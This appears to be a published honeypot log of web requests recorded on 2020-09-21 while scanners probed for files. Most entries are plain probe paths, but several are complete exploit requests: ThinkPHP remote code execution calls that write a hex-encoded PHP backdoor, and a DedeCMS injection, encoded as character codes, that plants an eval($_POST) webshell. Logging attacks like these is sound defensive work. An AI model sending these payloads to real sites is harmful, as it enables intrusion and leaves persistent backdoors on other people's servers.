File Access Bruteforce Attempts for 2020-09-21

Share on:
Sep 21, 2020 Reconnaissance

Last Updated: 23:09 GMT+8

  • /admin/index.php?route=common/login
  • /administrator/index.php
  • /asdasdasd.php
  • /asdasdasdx.php
  • /base/post.php
  • /bruteforce-files-list-2020-06-21//fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media
  • /bruteforce-files-list-2020-06-21//vendor/phpunit/phpunit/build.xml
  • /components/Raiz0WorM_1600646434.php
  • /fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media
  • /index.php?a=fetch&templateFile=public/index&prefix=2727&content=<php>file_put_contents(27asdasdasd.php27,27OK<?php20@eval($_POST[27909027]);?>27)</php>
  • /index.php?m=member&c=index&a=register&siteid=1
  • /index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1600646434.php
  • /index.php?option=com_fabrik&format=raw&task=plugin.pluginAjax&plugin=fileupload&method=ajax_upload
  • /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form22
  • /index.php?s=captcha
  • /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=asdasdasd.php&vars[1][1]=3C3F7068700D0A636C61737320554C42527B0D0A2020202066756E6374696F6E205F5F646573747275637428297B0D0A2020202020202020245057574A3D2255393130354D225E225C7833345C7834415C7834325C7835355C7834375C783339223B0D0A202020202020202072657475726E2040245057574A282224746869732D3E4353545922293B0D0A202020207D0D0A7D0D0A24756C62723D6E657720554C425228293B0D0A4024756C62722D3E435354593D697373657428245F4745545B226964225D293F6261736536345F6465636F646528245F504F53545B2239303930225D293A245F504F53545B2239303930225D3B0D0A3F3E
  • /index.php?s=Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=var_dump&vars[1][]=a1b2c3d4e5
  • /installation/index.php
  • /phpmyadmin/index.php
  • /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
  • /plus/erraddsave.php
  • /public/index.php?s=captcha
  • /public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=asdasdasd.php&vars[1][1]=3C3F7068700D0A636C61737320554C42527B0D0A2020202066756E6374696F6E205F5F646573747275637428297B0D0A2020202020202020245057574A3D2255393130354D225E225C7833345C7834415C7834325C7835355C7834375C783339223B0D0A202020202020202072657475726E2040245057574A282224746869732D3E4353545922293B0D0A202020207D0D0A7D0D0A24756C62723D6E657720554C425228293B0D0A4024756C62722D3E435354593D697373657428245F4745545B226964225D293F6261736536345F6465636F646528245F504F53545B2239303930225D293A245F504F53545B2239303930225D3B0D0A3F3E
  • /public/index.php?s=Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=var_dump&vars[1][]=a1b2c3d4e5
  • /put.php
  • /root.php
  • /UploadFile.php
  • /upload.php
  • /vendor/phpunit/phpunit/build.xml
  • /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
  • /wp-admin/admin-ajax.php
  • /wp-admin/admin-post.php?page=wysija_campaigns&action=themes
  • /wp-admin/install.php
  • /wp-admin/setup-config.php
  • /wp-content/_input_3_raiz0.php
  • /wp-content/plugins/cherry-plugin/admin/import-export/Raiz0__bvfca.php
  • /wp-content/plugins/cherry-plugin/admin/import-export/upload.php
  • /wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2018&Month=01
  • /wp-content/plugins/revslider/temp/update_extract/Raiz0__bvfca.php
  • /wp-content/plugins/showbiz/temp/update_extract/Raiz0__bvfca.php
  • /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
  • /wp-content/uploads/2018/01/Raiz0__bvfca.php
  • /wp-content/uploads/assignments/Raiz0_1600646434.php.
  • /wp-content/uploads/wysija/themes/Master/un.php
  • /wp-login.php
  • /xmlrpc.php?rsd
  • /XxX.php?XxX